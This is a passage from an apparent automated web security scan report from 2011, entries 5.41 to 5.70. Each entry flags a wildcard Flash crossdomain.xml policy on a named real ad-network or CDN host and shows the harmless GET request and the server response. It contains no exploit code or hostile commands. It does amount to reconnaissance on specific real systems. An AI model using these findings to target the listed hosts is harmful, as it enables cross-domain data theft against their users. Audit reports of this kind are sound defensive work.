Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Sat, 17 Sep 2011 00:52:01 GMT
Date: Sat, 17 Sep 2011 00:52:01 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

5.41. http://cdnbakmi.kaltura.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdnbakmi.kaltura.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdnbakmi.kaltura.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 07 Jul 2011 08:23:35 GMT
X-Me: pa-apache5
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/xml
Cache-Control: public, max-age=2385481
Expires: Fri, 14 Oct 2011 15:30:03 GMT
Date: Sat, 17 Sep 2011 00:52:02 GMT
Content-Length: 392
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
   <allow-access-from domain="*" to-ports="*" secure="false"/>
...[SNIP]...

5.42. http://clk.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Date: Sat, 17 Sep 2011 01:38:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

5.43. http://cplads.appspot.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cplads.appspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cplads.appspot.com

Response

HTTP/1.0 200 OK
ETag: "sEnQsA"
Date: Sat, 17 Sep 2011 00:52:18 GMT
Expires: Sat, 17 Sep 2011 01:02:18 GMT
Cache-Control: public, max-age=600
Content-Type: application/xml
Server: Google Frontend

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*" />
</cross-d
...[SNIP]...

5.44. http://d14.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d14.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d14.zedo.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Sat, 17 Sep 2011 01:10:21 GMT
Edge-Control: dca=esi, !no-store
ETag: "18033df-f8-44d91b1a7bf40"
Last-Modified: Mon, 19 May 2008 09:07:33 GMT
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Server: ECS (sjo/5227)
X-Cache: HIT
Content-Length: 248
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.45. http://d7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=5048
Date: Sat, 17 Sep 2011 01:11:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

5.46. http://dc.tremormedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dc.tremormedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: dc.tremormedia.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TremorUser=f166015f-92bf-489e-b027-c259d6238411

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:47:47 GMT
Server: Apache
Set-Cookie: TremorUser=f166015f-92bf-489e-b027-c259d6238411; path=/; expires=Sat, 14-Jun-14 01:47:47 GMT
Last-Modified: Wed, 24 Dec 2008 16:16:27 GMT
ETag: "1fe10f-bb-36c48cc0"
Accept-Ranges: bytes
Content-Length: 187
Cache-Control: max-age=0, no-store
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="*"/>
</cross-domain-policy>

5.47. http://dp.33across.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dp.33across.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dp.33across.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:11:47 GMT
Server: Apache
Last-Modified: Thu, 21 Jul 2011 23:56:36 GMT
Accept-Ranges: bytes
Content-Length: 211
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-doma
...[SNIP]...

5.48. http://ds.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Sat, 17 Sep 2011 01:09:56 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


5.49. http://edge.aperture.displaymarketplace.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://edge.aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: edge.aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://edge.aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:1005"
Server: Microsoft-IIS/6.0
X-Server: D2F.NJ-a.dm.com_x
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Sat, 17 Sep 2011 00:55:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 17 Sep 2011 00:55:47 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...

5.50. http://event.adxpose.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: event.adxpose.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"203-1313179768000"
Last-Modified: Fri, 12 Aug 2011 20:09:28 GMT
Content-Type: application/xml
Content-Length: 203
Date: Sat, 17 Sep 2011 01:03:33 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy> <allow-access-from domain="*" /></cross-domain-poli
...[SNIP]...

5.51. http://external.ak.fbcdn.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Sat, 17 Sep 2011 01:02:58 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

5.52. http://fw.adsafeprotected.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fw.adsafeprotected.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"202-1314985194000"
Last-Modified: Fri, 02 Sep 2011 17:39:54 GMT
Content-Type: application/xml
Content-Length: 202
Date: Sat, 17 Sep 2011 01:07:57 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

5.53. http://g-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 01:31:25 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.54. http://g.ca.bid.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g.ca.bid.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g.ca.bid.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 17 Sep 2011 01:29:16 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.55. http://g2.gumgum.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g2.gumgum.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: g2.gumgum.com

Response

HTTP/1.1 200 OK
Content-Type: application/xml;charset=UTF-8
Date: Sat, 17 Sep 2011 00:53:26 GMT
ETag: W/"202-1316039248000"
Last-Modified: Wed, 14 Sep 2011 22:27:28 GMT
Server: nginx/0.6.35
Content-Length: 202
Connection: Close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

5.56. http://goku.brightcove.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://goku.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: goku.brightcove.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 01:34:03 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT
Content-Length: 116
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
</cross-domain-policy>

5.57. http://gscounters.gigya.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gscounters.gigya.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:0"
Server: Microsoft-IIS/7.5
X-Server: web516
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
Date: Sat, 17 Sep 2011 01:02:02 GMT
Connection: close
Content-Length: 341

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

5.58. http://i.w55c.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i.w55c.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i.w55c.net

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:55:55 GMT
Server: Jetty(6.1.22)
Cache-Control: max-age=86400
Content-Length: 488
content-type: application/xml
Via: 1.1 iad061101000000 (MII-APC/2.1)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

   <allow-access-from domain="*" to-ports="*"/>
   <site-control
...[SNIP]...

5.59. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: sess=1; path=/; expires=Sun, 18-Sep-2011 00:52:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Sat, 04-Sep-2021 00:52:20 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.60. http://imagec12.247realmedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imagec12.247realmedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imagec12.247realmedia.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Last-Modified: Fri, 23 Apr 2010 15:55:10 GMT
ETag: "165deb-d0-484e973aff380"
Cteonnt-Length: 208
Content-Type: text/xml
Cache-Control: private, max-age=46094
Date: Sat, 17 Sep 2011 01:09:56 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

5.61. http://imp.fetchback.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imp.fetchback.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sat, 17 Sep 2011 00:52:25 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

5.62. http://js.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Sat, 17 Sep 2011 00:52:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.63. http://l.betrad.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.betrad.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=315360000, public
Content-Type: application/xml
Date: Sat, 17 Sep 2011 01:49:10 GMT
ETag: "4ded34bc=cf"
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Last-Modified: Mon, 06 Jun 2011 20:12:44 GMT
Server: Cherokee
Content-Length: 207
Connection: Close

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-p
...[SNIP]...

5.64. http://l.yimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.yimg.com

Response

HTTP/1.0 200 OK
Date: Fri, 16 Sep 2011 17:00:15 GMT
Cache-Control: max-age=315360000
Expires: Mon, 13 Sep 2021 17:00:15 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:54 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 28318
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

5.65. http://ll.static.abc.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ll.static.abc.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ll.static.abc.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=120
Content-Type: text/xml
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc03
X-Powered-By: ASP.NET
Cache-Expires: Wed, 10 Aug 2011 18:50:42 GMT
X-UA-Compatible: IE=EmulateIE7
Date: Sat, 17 Sep 2011 01:02:05 GMT
Last-Modified: Tue, 11 Jan 2011 22:19:13 GMT
Expires: Sat, 17 Sep 2011 01:04:05 GMT
Content-Length: 224
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>

<allow-access-from domain="*" secure="false" />

...[SNIP]...

5.66. http://llnwdo28.tmz.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://llnwdo28.tmz.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: llnwdo28.tmz.com
Proxy-Connection: keep-alive
Referer: http://www.kaltura.com/index.php/kwidget/cache_st/1316195504/wid/_591531/uiconf_id/4899061/entry_id/1_6mbkzzuu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2739F79705012FA3-6000010200347A89[CE]; __qca=P0-1573572205-1316238805525

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Type: application/xml
Age: 249118
Date: Sat, 17 Sep 2011 00:52:03 GMT
Last-Modified: Mon, 29 Aug 2011 16:39:43 GMT
Content-Length: 76
Connection: keep-alive

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>

5.67. http://load.exelator.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://load.exelator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: load.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "1221818522"
Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT
Content-Length: 148
Date: Sat, 17 Sep 2011 01:47:58 GMT
Server: HTTP server

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>

5.68. http://load.tubemogul.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://load.tubemogul.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: load.tubemogul.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"-1-1315335856000"
Last-Modified: Tue, 06 Sep 2011 19:04:16 GMT
host: rcv-srv25
Content-Type: application/xml
Content-Length: 204
Date: Sat, 17 Sep 2011 01:33:28 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.69. http://loadm.exelator.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://loadm.exelator.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: loadm.exelator.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "-298636579"
Last-Modified: Thu, 23 Apr 2009 17:36:11 GMT
Content-Length: 148
Date: Sat, 17 Sep 2011 01:14:01 GMT
Server: HTTP server

<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>

5.70. http://log.go.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://log.go.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

